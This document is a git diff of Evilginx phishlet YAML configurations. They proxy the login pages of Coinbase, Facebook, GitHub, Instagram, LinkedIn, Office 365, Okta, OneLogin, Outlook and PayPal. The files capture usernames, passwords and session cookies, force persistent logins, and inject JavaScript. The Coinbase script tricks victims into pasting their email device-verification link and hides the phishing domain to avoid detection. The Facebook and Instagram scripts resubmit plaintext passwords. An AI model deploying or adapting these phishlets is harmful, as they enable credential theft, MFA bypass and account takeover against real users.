# Use This Command To set the domain params from the evilginx command line.
|
||||
# Where ID is lure id number, and EXAMPLE.COM is your domain name.
|
||||
# lures edit params ID domain=EXAMPLE.COM
|
||||
|
||||
|
||||
author: '@An0nud4y'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'coinbase.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'ws', orig_sub: 'ws', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'google', orig_sub: 'www', domain: 'google.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'googletag', orig_sub: 'www', domain: 'googletagmanager.com', session: true, is_landing: false}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'assets', orig_sub: 'assets', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'dynamic', orig_sub: 'dynamic-assets', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'cdn', orig_sub: 'cdn', domain: 'ravenjs.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'sessions', orig_sub: 'sessions', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'events', orig_sub: 'events-service', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'exceptions', orig_sub: 'exceptions', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'images', orig_sub: 'images', domain: 'coinbase.com', session: true, is_landing: false}
|
||||
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'dynamic-assets', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'sessions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'events-service', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'exceptions', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'images', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: '', domain: 'coinbase.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'ws', domain: 'coinbase.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'google.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.coinbase.com', orig_sub: 'www', domain: 'googletagmanager.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
|
||||
auth_tokens:
|
||||
- domain: 'www.coinbase.com'
|
||||
keys: ['.*,regexp']
|
||||
auth_urls:
|
||||
- '/dashboard'
|
||||
- '/dashboard/.*'
|
||||
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
force_post:
|
||||
- path: '/sessions'
|
||||
search:
|
||||
- {key: 'email', search: '.*'}
|
||||
- {key: 'password', search: '.*'}
|
||||
force:
|
||||
- {key: 'stay_signed_in', value: '1'}
|
||||
type: 'post'
|
||||
- path: '/signin_step_two'
|
||||
search:
|
||||
- {key: 'token', search: '.*'}
|
||||
- {key: 'phone_number_id', search: '.*'}
|
||||
force:
|
||||
- {key: 'remember_computer', value: '1'}
|
||||
type: 'post'
|
||||
|
||||
login:
|
||||
domain: 'www.coinbase.com'
|
||||
path: '/signin'
|
||||
|
||||
|
||||
# "function lp()" will dynamically replace the contents in device authentication html page, and will create a new input box and button. Some other replacements are just to make page look better.
|
||||
# "function ValidateLink()" will replace the domain name 'coinbase.com' with the evilginx server domain name to verify the device from the IP of evilginx server, and will popup a new window with that modified auth link.
|
||||
# In that way we will be able to successfully authenticate the new device login.
|
||||
|
||||
# "function hcaptcha()" will replace the domain name during the captcha validation to decrease the possibility of getting caught by the user.
|
||||
|
||||
js_inject:
|
||||
- trigger_domains: ["www.coinbase.com"]
|
||||
trigger_paths: ["/device_confirmations/new"]
|
||||
trigger_params: [domain]
|
||||
script: |
|
||||
function lp(){
|
||||
var elem1 = document.getElementsByClassName("account-inner")[0];
|
||||
elem1.parentNode.removeChild(elem1);
|
||||
var elem2 = document.getElementsByClassName("device-support")[0];
|
||||
elem2.parentNode.removeChild(elem2);
|
||||
var div = document.createElement('div');
|
||||
div.className = 'account-inner';
|
||||
div.innerHTML = `
|
||||
<img class="account-icon" src="https://www.coinbase.com/assets/quickstart/icon-signup-9ed7432acbf85046d2a12f1e29f9e245d6e8376b379b524a1ebb6250c993f4d1.png">
|
||||
<div class="account-icon"></div>
|
||||
<h2 class="account-header">Authorize This Login</h2>
|
||||
<p>Copy The Verification Link Received in Email And Paste It Below To Verify The Login </p>
|
||||
<form action="">
|
||||
<fieldset>
|
||||
<input type="url" name="linkVerify" id="linkVerify" placeholder="https://coinbase.com/device_confirmations/confirm_email?token=xxxxxxxxxxxxxxxx" pattern="https://.*">
|
||||
<input class="btn" type="button" value="Verify Device" onclick="ValidateLink()">
|
||||
</fieldset></form>
|
||||
<p></p>
|
||||
`;
|
||||
document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
|
||||
var div = document.createElement('div');
|
||||
div.className = 'device-support';
|
||||
div.innerHTML = `
|
||||
<p>Email didn't arrive?</p>
|
||||
<p>Visit our <a href="https://support.coinbase.com/customer/portal/articles/2521789">Support Center</a>.</p>
|
||||
<p></p>
|
||||
<p>
|
||||
<a href="/email_recovery/new">
|
||||
I no longer have access to my email address
|
||||
</a> </p>
|
||||
`;
|
||||
document.getElementsByClassName("account-form device-confirmation")[0].appendChild(div);
|
||||
return;
|
||||
}
|
||||
function ValidateLink(){
|
||||
var domain = "{domain}"
|
||||
var link1 = document.getElementById("linkVerify").value;
|
||||
var link2 = link1.replace('coinbase.com', domain);
|
||||
console.log(link2)
|
||||
window.open(link2, '_blank').focus();
|
||||
}
|
||||
setTimeout(function(){ lp(); }, 2500);
|
||||
|
||||
|
||||
# HCAPTCHA Header That shows domain name can be Replaced dynamically with javascripts, Its Disabled Here Because Its resulting in Hcaptcha error, Find your ways to solve it.
|
||||
#
|
||||
# - trigger_domains: ["www.coinbase.com"]
|
||||
# trigger_paths: ["/signin","/signin*"]
|
||||
# trigger_params: []
|
||||
# script: |
|
||||
# function hcaptcha(){
|
||||
# var elem = document.getElementsByClassName("cf-subheadline")[0];
|
||||
# elem.parentNode.removeChild(elem);
|
||||
# var div = document.createElement('div');
|
||||
# div.className = 'cf-subheadline';
|
||||
# div.innerHTML = `
|
||||
# <h2 class="cf-subheadline"><span data-translate="complete_sec_check">Please complete the security check to get access to</span> Coinbase Website</h2>
|
||||
# `;
|
||||
# document.getElementsByClassName("cf-wrapper cf-header cf-error-overview")[0].appendChild(div);
|
||||
# return;
|
||||
# }
|
20
phishlets/example.yaml
Normal file
20
phishlets/example.yaml
Normal file
@ -0,0 +1,20 @@
|
||||
min_ver: '3.0.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'academy', orig_sub: 'academy', domain: 'breakdev.org', session: true, is_landing: true, auto_filter: true}
|
||||
sub_filters:
|
||||
- {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}
|
||||
auth_tokens:
|
||||
- domain: '.academy.breakdev.org'
|
||||
keys: ['cookie_name']
|
||||
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'academy.breakdev.org'
|
||||
path: '/evilginx-mastery'
|
@ -1,54 +0,0 @@
|
||||
author: '@charlesbel'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'm', orig_sub: 'm', domain: 'facebook.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'static', orig_sub: 'static', domain: 'xx.fbcdn.net', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.facebook.com', orig_sub: 'www', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'www.facebook.com', orig_sub: 'static', domain: 'xx.fbcdn.net', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '2F{hostname}', replace: '2F{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '\\\\\\/\\\\\\/{hostname}', replace: '\\\\\\/\\\\\\/{hostname}', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: 'https:\/\/{hostname}\/', replace: 'https:\/\/{hostname}\/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.facebook.com', orig_sub: 'm', domain: 'facebook.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'static.xx.fbcdn.net', orig_sub: 'www', domain: 'facebook.com', search: ':"{domain}";', replace: ':"{domain}";', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.facebook.com'
|
||||
keys: ['c_user','xs','sb']
|
||||
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'unenc_password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
|
||||
|
||||
login:
|
||||
domain: 'www.facebook.com'
|
||||
path: '/login.php'
|
||||
|
||||
js_inject:
|
||||
- trigger_domains: ["www.facebook.com"]
|
||||
trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"]
|
||||
trigger_params: []
|
||||
script: |
|
||||
function onclickListener(){
|
||||
var submit = document.querySelectorAll('button[type=submit]')[0];
|
||||
submit.setAttribute("onclick", "sendPass()");
|
||||
return;
|
||||
}
|
||||
function sendPass(){
|
||||
var password = document.getElementsByName("pass")[0].value;
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", '/login/device-based/regular/login/', true);
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.send("unenc_password="+encodeURIComponent(password));
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ onclickListener(); }, 1000);
|
@ -1,29 +0,0 @@
|
||||
author: '@audibleblink'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: '', orig_sub: '', domain: 'github.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'api', orig_sub: 'api', domain: 'github.com'}
|
||||
- {phish_sub: 'github', orig_sub: 'github', domain: 'githubassets.com'}
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'github.com', orig_sub: '', domain: 'github.com', search: 'integrity="(.*?)"', replace: '', mimes: ['text/html']}
|
||||
|
||||
auth_tokens:
|
||||
- domain: '.github.com'
|
||||
keys: ['logged_in', 'dotcom_user']
|
||||
- domain: 'github.com'
|
||||
keys: ['user_session', '_gh_sess']
|
||||
|
||||
credentials:
|
||||
username:
|
||||
key: 'login'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
|
||||
login:
|
||||
domain: 'github.com'
|
||||
path: '/login'
|
@ -1,45 +0,0 @@
|
||||
author: '@charlesbel'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'm', orig_sub: 'm', domain: 'instagram.com', session: true, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json']}
|
||||
- {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
- {triggers_on: 'm.instagram.com', orig_sub: 'm', domain: 'instagram.com', search: '''{domain}'';', replace: '''{domain}'';', mimes: ['text/html', 'application/json', 'application/x-javascript']}
|
||||
auth_tokens:
|
||||
- domain: '.instagram.com'
|
||||
keys: ['sessionid','.*,regexp']
|
||||
credentials:
|
||||
username:
|
||||
key: 'user'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'unenc_password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.instagram.com'
|
||||
path: '/accounts/login'
|
||||
js_inject:
|
||||
- trigger_domains: ["www.instagram.com"]
|
||||
trigger_paths: ["/accounts/login"]
|
||||
trigger_params: []
|
||||
script: |
|
||||
function onclickListener(){
|
||||
var submit = document.querySelectorAll('button[type=submit]')[0];
|
||||
submit.setAttribute("onclick", "sendPass()");
|
||||
return;
|
||||
}
|
||||
function sendPass(){
|
||||
var password = document.getElementsByName("password")[0].value;
|
||||
|
||||
var xhr = new XMLHttpRequest();
|
||||
xhr.open("POST", '/accounts/login/ajax/', true);
|
||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
||||
xhr.send("unenc_password="+encodeURIComponent(password));
|
||||
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){ onclickListener(); }, 1000);
|
@ -1,36 +0,0 @@
|
||||
author: '@mrgretzky'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.www.linkedin.com'
|
||||
keys: ['li_at']
|
||||
credentials:
|
||||
username:
|
||||
key: 'session_key'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'session_password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'www.linkedin.com'
|
||||
path: '/uas/login'
|
||||
js_inject:
|
||||
- trigger_domains: ["www.linkedin.com"]
|
||||
trigger_paths: ["/uas/login"]
|
||||
trigger_params: ["email"]
|
||||
script: |
|
||||
function lp(){
|
||||
var email = document.querySelector("#username");
|
||||
var password = document.querySelector("#password");
|
||||
if (email != null && password != null) {
|
||||
email.value = "{email}";
|
||||
password.focus();
|
||||
return;
|
||||
}
|
||||
setTimeout(function(){lp();}, 100);
|
||||
}
|
||||
setTimeout(function(){lp();}, 100);
|
@ -1,37 +0,0 @@
|
||||
name: 'o365'
|
||||
author: '@jamescullum'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing:false}
|
||||
# The lines below are needed if your target organization utilizes ADFS.
|
||||
# If they do, you need to uncomment all following lines that contain <...>
|
||||
# To get the correct ADFS subdomain, test the web login manually and check where you are redirected.
|
||||
# Assuming you get redirected to adfs.example.com, the placeholders need to be filled out as followed:
|
||||
# <insert-adfs-subdomain> = adfs
|
||||
# <insert-adfs-host> = example.com
|
||||
# <insert-adfs-subdomain-and-host> = adfs.example.com
|
||||
#- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>', session: true, is_landing:false}
|
||||
#- {phish_sub: 'adfs', orig_sub: '<insert-adfs-subdomain>', domain: '<insert-adfs-host>:443', session: true, is_landing:false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.microsoftonline.com', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
|
||||
# Uncomment and fill in if your target organization utilizes ADFS
|
||||
#- {triggers_on: '<insert-adfs-subdomain-and-host>', orig_sub: 'login', domain: 'microsoftonline.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
auth_tokens:
|
||||
- domain: '.login.microsoftonline.com'
|
||||
keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT']
|
||||
- domain: 'login.microsoftonline.com'
|
||||
keys: ['SignInStateCookie']
|
||||
credentials:
|
||||
username:
|
||||
key: '(login|UserName)'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: '(passwd|Password)'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'login.microsoftonline.com'
|
||||
path: '/'
|
@ -1,23 +0,0 @@
|
||||
author: '@mikesiegel'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'login', orig_sub: 'login', domain: 'okta.com', session: false, is_landing: false}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'okta.com', session: false, is_landing: false }
|
||||
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'okta.com', session: true, is_landing: true}
|
||||
sub_filters:
|
||||
- {triggers_on: 'EXAMPLE.okta.com', orig_sub: '', domain: 'EXAMPLE.okta.com', search: 'sha384-.{64}', replace: '', mimes: ['text/html']}
|
||||
auth_tokens:
|
||||
- domain: 'EXAMPLE.okta.com'
|
||||
keys: ['sid']
|
||||
credentials:
|
||||
username:
|
||||
key: ''
|
||||
search: '"username":"([^"]*)'
|
||||
type: 'json'
|
||||
password:
|
||||
key: ''
|
||||
search: '"password":"([^"]*)'
|
||||
type: 'json'
|
||||
login:
|
||||
domain: 'EXAMPLE.okta.com'
|
||||
path: '/login/login.htm'
|
@ -1,52 +0,0 @@
|
||||
name: 'onelogin'
|
||||
author: '@perfectlylogical'
|
||||
min_ver: '2.3.0'
|
||||
# NOTE: Do not forget to change EXMAPLE to the relevant sub domain.
|
||||
proxy_hosts:
|
||||
- {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false }
|
||||
- {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
|
||||
# Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading.
|
||||
#- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false}
|
||||
sub_filters: []
|
||||
auth_tokens:
|
||||
- domain: '.onelogin.com'
|
||||
keys: ['onelogin.com_user']
|
||||
- domain: 'EXAMPLE.onelogin.com'
|
||||
keys: ['sub_session_onelogin.com']
|
||||
auth_urls:
|
||||
- '/portal/'
|
||||
- '/client/apps'
|
||||
# This is used to force the rememebr me functionality if the target is using the /login url
|
||||
# This method will not work if they are using the multistep login method on the /login2 url
|
||||
force_post:
|
||||
- path: '/sessions'
|
||||
search:
|
||||
- {key: 'authenticity_token', search: '.*'}
|
||||
- {key: 'email', search: '.*'}
|
||||
- {key: 'password', search: '.*'}
|
||||
force:
|
||||
- {key: 'persist_session', value: 'true'}
|
||||
type: 'post'
|
||||
# The post type is used to capture credentials which use the /login url
|
||||
# The json type is used to capture credentials which use the /login2 url
|
||||
credentials:
|
||||
username:
|
||||
key: 'email'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
username:
|
||||
key: 'login'
|
||||
search: '"login":"(.*)"'
|
||||
type: 'json'
|
||||
password:
|
||||
key: 'password'
|
||||
search: '"password":"(.*)",'
|
||||
type: 'json'
|
||||
login:
|
||||
domain: 'EXAMPLE.onelogin.com'
|
||||
path: '/login'
|
@ -1,31 +0,0 @@
|
||||
author: '@mrgretzky'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'outlook', orig_sub: 'outlook', domain: 'live.com', session: true, is_landing: true}
|
||||
- {phish_sub: 'login', orig_sub: 'login', domain: 'live.com', session: true, is_landing: false}
|
||||
- {phish_sub: 'account', orig_sub: 'account', domain: 'live.com', session: false, is_landing: false}
|
||||
sub_filters:
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetCredentialType.srf', replace: 'https://{hostname}/GetCredentialType.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'https://{hostname}/GetSessionState.srf', replace: 'https://{hostname}/GetSessionState.srf', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'login', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'outlook', domain: 'live.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
|
||||
- {triggers_on: 'login.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'account.live.com', orig_sub: 'live', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
- {triggers_on: 'account.live.com', orig_sub: 'account', domain: 'live.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
|
||||
auth_tokens:
|
||||
- domain: '.live.com'
|
||||
keys: ['WLSSC','RPSSecAuth']
|
||||
credentials:
|
||||
username:
|
||||
key: 'login'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
password:
|
||||
key: 'passwd'
|
||||
search: '(.*)'
|
||||
type: 'post'
|
||||
login:
|
||||
domain: 'outlook.live.com'
|
||||
path: '/owa/?nlp=1'
|
@ -1,70 +0,0 @@
|
||||
# AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
|
||||
# PLEASE DO NOT MISUSE THIS PHISHLET.
|
||||
|
||||
# Email Params can be Triggered By using Below Command.
|
||||
# lures edit params ID email=test@email.com
|
||||
# Where ID is lure id number, and test@email.com is your known victim account email address for paypal.
|
||||
|
||||
author: '@An0nud4y'
|
||||
min_ver: '2.3.0'
|
||||
proxy_hosts:
|
||||
- {phish_sub: 'www', orig_sub: 'www', domain: 'paypal.com', session: true, is_landing: true, auto_filter: true}
|
||||
- {phish_sub: '', orig_sub: '', domain: 'paypal.com', session: true, is_landing: false, auto_filter: true}
|
||||
# - {phish_sub: 'paypalobjects', orig_sub: 'www', domain: 'paypalobjects.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'c', orig_sub: 'c', domain: 'paypal.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'b.stats', orig_sub: 'b.stats', domain: 'paypal.com', session: false, is_landing: false}
|
||||
- {phish_sub: 't', orig_sub: 't', domain: 'paypal.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'c6', orig_sub: 'c6', domain: 'paypal.com', session: false, is_landing: false}
|
||||
- {phish_sub: 'hnd.stats', orig_sub: 'hnd.stats', domain: 'paypal.com', session: false, is_landing: false}
|
||||
|
||||
sub_filters:
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: 'https://{hostname_regexp}/', replace: 'https://{hostname_regexp}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
- {triggers_on: 'www.paypal.com', orig_sub: 'www', domain: 'paypal.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
|
||||
